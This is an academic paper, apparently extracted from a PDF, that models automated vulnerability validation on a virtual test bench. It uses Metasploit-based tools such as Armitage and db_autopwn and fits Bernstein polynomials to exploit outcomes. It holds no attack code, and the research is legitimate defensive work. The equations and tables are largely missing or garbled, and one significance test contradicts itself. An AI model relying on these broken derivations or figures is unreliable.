DEVELOPMENT OF A METHOD FOR CHECKING VULNERABILITIES OF A CORPORATE NETWORK USING BERNSTEIN TRANSFORMATIONS

R o m a n K y r y c h o k PhD Department of Information and Cyber Security named after Professor Volodymyr Вuriachok Borys Hrinchenko Kyiv University Bulvarno-Kudriavska str., 18/2, Kyiv, Ukraine, 04053 O l e k s a n d r L a p t i e v Corresponding author Doctor of Technical Sciences, Associate Professor, Senior Researcher Department of Cyber Security and Information Protection* E-mail: alaptev64@ukr.net R o s t y s l a v L i s n e v s k y i PhD, Associate Professor Information Department System and Technologies* V a l e r i i K o z l o v s k y i Doctor of Technical Sciences, Professor, Head of Department** V i t a l i y K l o b u k o v PhD, Assistant** *Taras Shevchenko National University of Kyiv Volodymyrskastr., 60, Kyiv, 01033 **Department of Information Security National Aviation University Liubomyra Huzara ave., 1, Kyiv, Ukraine, 03058 One of the leading areas of cybersecurity of communication networks is considered – the introduction of preventive mechanisms, among which the most promising are the methods of active security analysis. These methods allow, in addition to timely detection of vulnerabilities of the target system (analyzed system), to confirm the possibility of their implementation, that is, to validate vulnerabilities by simulating the real actions of a potential attacker. The urgent need to validate vulnerabilities out of the many identified is caused by the fact that some of them can only be theoretical, while others are exploited using malicious scripts (exploits). At the same time, the process of validating vulnerabilities is practically not studied. That is why the work carried out an experimental study of the functioning of modern tools for exploiting vulnerabilities. Based on the observations, general quantitative characteristics of the vulnerability validation process were identified. A mathematical model for the analysis of the above characteristics based on Bernstein polynomials has been developed. It is the polynomial representation of the procedure for confirming the possibility of implementing the identified vulnerabilities that makes it possible to describe the dynamics of this process, taking into account the complex and volatile nature of the environment. Analytical dependencies are obtained for the number of cases of successful and negative confirmation of vulnerabilities. In particular, negative validation cases include simply failed attempts to validate vulnerabilities, as well as attempts that resulted in critical errors on the target system during the rational cycle of validating the identified vulnerabilities. The proposed dependencies make it possible to construct the probability distribution laws for the above characteristics of the vulnerability testing process


Introduction
Based on the latest published data regarding the cybersecurity of companies, it is possible to determine how effective measures are taken by companies to protect their corporate networks. A report [1], released in November 2021 by Accenture, states that 55 % of companies (with an annual income of more than 1 billion USD) do not effectively prevent cyber attacks, they are too slow to identify and fix vulnerabilities.
One of the leading directions in ensuring the cybersecurity of communication networks of enterprises and institutions is the introduction of not only mechanisms for detecting cyber attacks, but also the introduction of preventive mechanisms. Among them, the most promising are the methods of active analysis of the security of corporate networks. These methods allow, in addition to the timely detection of vulnerabilities of the target system (the analyzed system), also to check them, that is, to confirm the possibility of implementing specific vulnerabilities by simulating the real actions of a potential attacker. It is the verification of identified vulnerabilities that is a key element of active security analysis, since some vulnerabilities are purely theoretical in nature, while others can be implemented using known exploits. It should be noted that on the Internet there can be both internal threats from inexperienced users, and external ones with the possibility of cyber attacks. Depending on their goals, attackers can implement entire attack strategies that consist of multi-stage attack chains. Therefore, the improvement of technologies for the timely detection and closing of vulnerabilities in corporate networks that allow minimizing the risk of a cyber attack is an urgent issue [2,3].

Literature review and problem statement
Based on the experience gained, it can be argued that cyberspace, de facto and de jure, has become a new theater of war.
For example, article [4] discusses theories and practices of cybersecurity. The analysis presented in the work showed that in order to disable the critical information infrastructure of the state. An attacker or an opposing party carries out cyber attacks using special samples of malicious software -cyber weapons. Cyber-weapons, such as Stuxnet, Gauss, Duqu, Wiper, Flame, miniFlame, Uroburos (Snake), etc. But there are no clear actions, methods and techniques to counter these threats.
Article [5] shows that attacks are designed exclusively for a specific computer network and are aimed at its most vulnerable components. Typically, such malware samples target a zero-day vulnerability. However, the methodology for checking attacks and real threats to computer networks is not considered and is not given.
Article [6] deals with threats to computer systems and military networks. Examples are given that the implementation of such and other potentially dangerous cyber attacks is unacceptable, since the failure of control processes in such systems will lead to their failure to fulfill their tasks. Thus, the study of world experience has shown that the number of cyber attacks on computer systems and networks of critical infrastructure is constantly increasing. At the same time, their technological complexity increases, which, in turn, makes it impossible or difficult for information security systems to detect such cyber attacks. The information security systems currently used to detect cyber attacks are not fully capable of detecting potentially dangerous cyber attacks, as evidenced by the facts that have taken place in the world.
Article [7] provides a general analysis of cyberattacks. It is shown that, last but not least, the attacks are based mainly on signature-based approaches to the construction of cyberattack templates, which are characterized by the presence of a «delay effect» in the development of the necessary signature. Therefore, other, alternative approaches are needed, focused on the detection of new, potentially dangerous cyber attacks.
The article [8] justifies and proves that the scientific task of providing the necessary level of protection of computer systems and networks from potentially dangerous cyber attacks requires the development of a new and effective method for constructing their templates. It is shown that the methodology for constructing patterns of potentially dangerous cyberattacks is rather complicated. The need to ensure high reliability of detection entails the need to take into account many informative characteristics or signs of a potentially dangerous cyber attack. Due to the different representation of the formats of characteristics of cyber attacks, which are defined differently by different vendors of information security systems, in practice there is an imbalance in their reduction to one metric system. As a result, it becomes impossible to use the characteristics of potentially dangerous cyberattacks to create their templates.
The article [9] considers the reasons for the violation of information security of computer networks. In particular, such main reasons are cited as: vulnerabilities in operating systems and applications, the presence of vulnerable or easily attacked services and malicious software, etc. It also mentions the danger of incorrect configuration of hardware and software, errors made when setting up access control. Using combinations of existing vulnerabilities and flaws in the network configuration and applied security policy, attackers (both external and internal), depending on their goals, can implement a variety of attack strategies. However, the methodology for checking attacks and real threats to computer networks is not considered and is not given.
The article [10] provides data that any company in its activities uses the wide opportunities that the Internet provides. However, along with the opportunities, the World Wide Web brings many threats to information security. The implementation of these threats can lead to significant material and reputational damage to the business. The types of network attacks and ways of their implementation are considered. However, the methodology for identifying vulnerabilities in software and hardware platforms for automated active analysis of the security of target corporate networks is not given.
At the same time, despite a significant number of publications on addressing various aspects of improving security and methods for identifying vulnerabilities, it becomes clear that the vulnerability analysis process remains ineffective [11][12][13][14][15]. There is no clearly described practical implementation of the rapid detection of vulnerabilities in enterprise computer networks. That is, there is a contradiction between the need for prompt (real-time), high-quality detection and verification of vulnerabilities in enterprise communication networks and the capabilities of existing methods for automating the process of actively analyzing their security.

The aim and objectives of research
The aim of this research is to develop an effective method for checking the vulnerabilities of software and hardware platforms for automated active analysis of the security of target corporate networks. This will make it possible to minimize the risks of cyber incidents associated with the presence of vulnerabilities in the target systems of the organization's information infrastructure. In addition, it allows to bypass the lack of highly qualified specialists in conducting an active analysis of the security of corporate networks.
To achieve the aim, the following objectives were set: -conduct an experimental and practical study of the process of checking the vulnerabilities of information systems using special plug-ins to automate this process in a modern tool for exploiting vulnerabilities; -develop a mathematical model for analyzing the quantitative characteristics of the vulnerability testing process, taking into account the complex and volatile nature of the environment; -simulate the analysis of the quantitative characteristics of the vulnerability testing process and obtain analytical dependencies for the number of cases of successful and negative confirmation of vulnerabilities; -perform a theoretical substantiation of the adequacy of the obtained analytical dependencies.

Materials and methods of research
The idea of preventive mechanisms for ensuring the information security of communication networks of enterprises and institutions is to identify weaknesses before the attack by intruders. At the same time, the protection of weaknesses in this study is understood not as architectural (admitted at the design stage), but primarily as «operational gaps» (vulnerabilities). Such problems often arise during the operation of networks as a result of administrative errors or untimely software updates on individual information systems of such networks. What's more, by putting yourself in the shoes of a potential attacker, it is possible to determine the methods of hacking, the problems that an attacker might encounter, and the specific resources and materials that can be accessed [16][17][18][19][20].
Based on this, let's understand network security as a certain state of the network that makes it possible to resist any cyber attacks or the possible implementation of certain threats to information security. Preserving the confidentiality, integrity and availability of data and network components. Security analysis is the process of checking the network infrastructure for possible vulnerabilities and vulnerabilities in the network perimeter, including errors in configuration, software, and application source code.
All experiments were performed on a machine running Windows 10 Pro x64 v1803, Intel Core i5-3210M CPU 2.50 GHz and 12 GB RAM using the VMware Workstation 12 Pro v12.5.9 build-7535481 virtualization platform on which a special test bench was deployed. A schematic representation of this stand is shown in Fig. 1. . It should be noted that this sample of platforms was formed taking into account statistical data from Netmarketshare and Statcounter on the prevalence of specific operating systems in the world [28,29]. According to the data presented, about 20 % of respondents in the business environment continue to use outdated versions and even more in government institutions.
All experiments are a series of automatic security analyzes of the same target hosts using the above exploits, and subsequent analysis of the results of their work.
At the same time, to conduct these experiments, a special technique was developed, which provides for the following system of actions: 1. After deploying the test bench and setting up all target hosts, create snapshots (VMware snapshots) of the virtual machine data to preserve its original (initial) state. A virtual machine snapshot is a copy of a virtual machine disk file (VMDK) at a specific point in time that allows to restore the saved state of the virtual machine.
2. Analyze the security of the next host using the Armitage graphical cyber attack management tool using the Hail Mary exploit mode, save the results and restore the VMware image to the original state of the target host under investigation.
3. Analyze the security of the next host using the db_autopwn automation and cyber attack plugin, save the results, and restore the VMware image to the original state of the target host under investigation. 4. In case of a critical error in steps 2 and 3, during the active security analysis, restore the original state of the investigated target host and reanalyze it, excluding from the list of exploits that led to this error.
5. Arrange the results of the experiments in the form of a table.

Results of research on the development of an effective method for checking the vulnerabilities
of software and hardware platforms of target corporate networks

1. Experimental and practical study of the process of checking the vulnerabilities of information systems using the vulnerability exploitation toolkit
Using the system of actions presented above, a number of observations of the functioning of automated means of exploiting the discovered vulnerabilities were carried out. As a result, it was found that the process of validating the vulnerabilities of hosts of the target corporate network can be represented by a vector (q s , q f , q c ) of a three-dimensional vector space. The abscissa q s determines the number of successfully tested vulnerabilities of the target system, the ordinate q f determines the number of unsuccessful vulnerability checks. At the same time, the q c applicate determines the number of vulnerability validation cases that led to a critical error in the target system and subsequent loss of communication.
The obtained statistical data of the results of experimental and practical research are given in Table 1.
In Table 1 -the total number of attempts to exploit the identified vulnerabilities of an individual host of the target corporate network; t -the total time for checking the identified vulnerabilities of an individual host of the target corporate network, expressed in seconds.
After analyzing the data in Table 1, it follows that each of the coordinates of the vector (q s , q f , q c ) is constantly changing in time, during which an active analysis of the security of the corporate network is being carried out. At the same time, all three coordinates are connected by some functional dependence.

2. Development of a mathematical model for analyzing the quantitative characteristics of the vulnerability testing process
Unlike deterministic dynamic systems, which can be described by differential equations based on the nature of the system, the task of vulnerability testing is not unique.
Therefore, to build the model, let's use an approach based on the use of a polynomial estimate based on the first Weierstrass theorem, as one of the main approaches to solving problems of nonparametric approximation. It consists in the following: if the function f(x) is continuous on the segment [a, b], then there is a sequence of polynomials {P n (x)} that converges uniformly on the segment [a, b] to f(x). Thus, for any ε>0, there is a polynomial P n (x) with number n that depends on ε, such that: for all x on the segment [a, b].
This theorem was proved in 1912 by a famous scientist [2]. The following polynomials P n (x) were used as approximating polynomials P n (x): The function b k,n (x) is called the basic Bernstein polynomial of degree n, the operators B n (f; x), respectively, are Bernstein polynomials of order n in the function f(x), and the coefficients f(k/n) are called the Bernstein coefficients.
In [2], based on elementary results of probability theory, it is proved that the sequence of polynomials {B n (f;x)} converges n→∞ to f(x) uniformly on [0, 1], i.e.: lim .
if the function f(x) on the segment [0, 1] satisfies the Lipschitz condition [3] with constant M. Thus, due to the impossibility of using differential equations, to build a mathematical model for analyzing the quantitative characteristics of the vulnerability testing process, it was decided to use Bernstein polynomials. These polynomials make it possible to successfully approximate analytical dependencies.

3. Analysis of the quantitative characteristics of the process of checking vulnerabilities using the method of mathematical modeling
Based on the results of an experimental study of the operation of modern automated means of exploiting vulnerabilities (Table 1), a mathematical model for analyzing the quantitative characteristics of the process of checking the vulnerabilities of information systems using the regression analysis method was built. To do this, let's first evaluated the statistical relationship between the variables t and q s , q f , q c in the study of the validation mechanism of the Armitage graphical cyber attack management tool using the correlation coefficient R.
According to the table 1, auxiliary values are calculated: sample mean (  t ,  q ), variance (D t , D q ), and standard deviation (σ t , σ q ).
The results are shown in Table 2. From the data in Table 2 it follows that there is a linear relationship between the variables t and q s , q f , q c , since none of the values of R is equal to zero.
It should be noted that the closest linear relationship is observed between the values of t and q f . Accordingly, it can be argued that with an increase in one value, on average, the other also increases.
In addition, the correspondence of the sample value of the correlation coefficient R to the correlation value (ρ) between the general sets of values of t and q s , q f , q c was checked using The results of determining the values of t calc are presented in Table 3.  Comparison of the obtained values t calc with the theoretical ones with the number of degrees of freedom f = n-2 = 9 and α = 5 %, there are the following results: -for t, q s -t calc >t table let's obtain 2.254>2.096, this indicates a direct relationship between the time of checking the identified vulnerabilities and the number of successfully checked vulnerabilities; -for for t, q f -t calc >t table let's obtain 4.693>2.096, this indicates a significant direct relationship between the time of checking the identified vulnerabilities and the number of unverified vulnerabilities; -for for t, q c -t calc >t table let's obtain 0.216<2.096, which indicates a very weak relationship between the time of checking the identified vulnerabilities and the number of vulnerability checks that led to critical errors on the target host.
From the data in Table 1 it is possible to show that the time for a rational vulnerability check cycle, in the case of the Armitage tool, is 345 seconds. Therefore, it is possible to first normalize the time interval as follows: where t n -normalized time; T -target host vulnerability check time in seconds (rational cycle time); t i -time during which the corresponding characteristics (q s , q f , q c ) took their values within the rational cycle.
The results of normalization of the time interval are presented in Table 4.
Then the values of the variables q s (t n ), q f (t n ), q c (t n ), as a function of the normalized time, are presented in Table 5.
Then, using the data in Table 5 and expressions (1), let's finally obtain the initial analytical dependencies for the number of successfully tested vulnerabilities q s = q s (t n ): . .

t t n ( ).
After substituting the corresponding values from Table 5, simplifying the expression:

. (5)
From the Table 6 it is shown that the values of b k,11 (t n ), for k = 0 11 ... . Similarly, using (1) and the data in Table 5, let's obtain the initial analytical dependencies for the number of untested vulnerabilities q f = q f (t n ), (6) and the number of vulnerability testing cases that led to critical errors q c = q c (t n ), (7): (1-t) 11 1 11t(1-t) 10 2 55t 2 (1-t) 9 3 Thus, as a result, the following analytical dependencies were obtained: these are the final expressions for the studied characteristics of the information systems vulnerability validation process. It is the polynomial representation of the procedure for confirming the possibility of implementing the identified vulnerabilities that makes it possible to describe the dynamics of the vulnerability validation process, taking into account the complex and volatile nature of the environment. Table 7 presents the comparative values of the results of the calculation and the data of the Table 5. Table 7 Comparative values for q s (t n )  From the data given in Table 7, it can be seen that the function q s = q s (t n ) of a successful vulnerability check satisfies the Lipschitz condition [3]

4. Justification of the adequacy of the obtained analytical dependences
It follows from condition (9) that there is a rectangular area outside of which the graph of the function q s = q s (t n ) is not defined. This makes it possible in the future to build probability distribution laws for the number of successfully tested vulnerabilities. In addition, when condition (9) is satisfied, estimate (2) is valid, i.e., Dependence (11) allows to set the appropriate accuracy of determining the degree of the Bernstein polynomial.
Thus, using the data in Table 7 and dependence (11), the maximum value for q s = q s (t n ) is defined as: 1 11 Also, generalized data were obtained by similarly modeling the analysis of other quantitative characteristics of the vulnerability testing process. In particular, data were obtained on the number of failed vulnerability checks and the number of vulnerability checks that led to critical errors during the rational cycle of checking for identified vulnerabilities. The results of the corresponding comparisons are presented in Table 8, 9. Table 8 Comparative values for q f (t n )   In addition, using the data in Table 8, 9 and dependence (11) 1 11 Analysis of data in the Table 7-9 shows that there is a certain deviation due to the fact that a small number of terms were taken during the study, but such a deviation is acceptable.

Discussion of the results on the development of an effective method for checking the vulnerabilities of software and hardware platforms of target corporate networks
In the course of an experimental study of the functioning of modern means of exploiting vulnerabilities, generalized characteristics of the vulnerability verification process were identified. In particular, this is the number of successfully tested vulnerabilities of the target system -q s , as well as the number of negative confirmations of vulnerabilities. The latter include the number of failed vulnerability checks -q f and the number of cases of vulnerability validation that led to a critical error in the target system and subsequent loss of communication -q c .
In the course of modeling the analysis of the above quantitative characteristics of the vulnerability testing process, analytical dependencies (8) were derived, which fully reflect the dynamics of this process.
Comparison of empirical data obtained during the study of the process of checking the vulnerabilities of information systems using vulnerability exploitation tools with the calculated values shows an acceptable deviation (Tables 7-9). It should be noted that as the number of values increases, these deviations become smaller and smaller. At the same time, for further research related to erroneous attempts to validate vulnerabilities and cases of validation that led to critical errors, this difference is not significant.
Thus, the proposed analytical dependencies make it possible to construct the laws of probability distribution of the above characteristics of the vulnerability validation process. This is a distinctive feature of the developed method.
However, it should be noted that the vulnerability validation process involves checking vulnerabilities using only known exploits. This approach is somewhat limited due to the fact that checks for the possibility of implementing previously unknown vulnerabilities, for example, zero-day vulnerabilities, remain unaccounted for, and requires further development.
The disadvantage of the developed method is an increase in the time for calculating vulnerabilities, but this disadvantage is not critical with the modern rapid development of computer technology. The direction of further research can be considered the improvement of the method by taking into account additional factors for the analysis of vulnerabilities that fell outside the scope of consideration during the development of this method.

Conclusions
1. In the course of an experimental study of the functioning of modern means of exploiting vulnerabilities, generalized characteristics of the vulnerability verification process have been identified. In particular, this is the number of successfully tested vulnerabilities of the target system, the number of unsuccessful checks, as well as the number of cases of vulnerability validation that led to a critical error in the target system and subsequent loss of communication. These characteristics take into account the complex and changing nature of the environment, as well as the risk of a critical error in the functioning of the target system when exploiting vulnerabilities.
2. A mathematical model has been developed to analyze the quantitative characteristics of the vulnerability testing process, taking into account the complex and volatile nature of the environment. A feature of the developed model is the use of Bernstein polynomial transformations.
3. In the course of modeling the analysis of the generalized quantitative characteristics of the vulnerability testing process, their analytical dependencies have been derived, which fully reflect the dynamics of this process. 4. In the course of comparing the empirical data obtained during the study of the process of checking the vulnerabilities of information systems, carried out by full-scale modeling, with the calculated values, it has been found that the deviation cannot exceed 20 %. The error of the results obtained in identifying critical vulnerabilities was no more than 17 %, which confirms the adequacy of the developed model.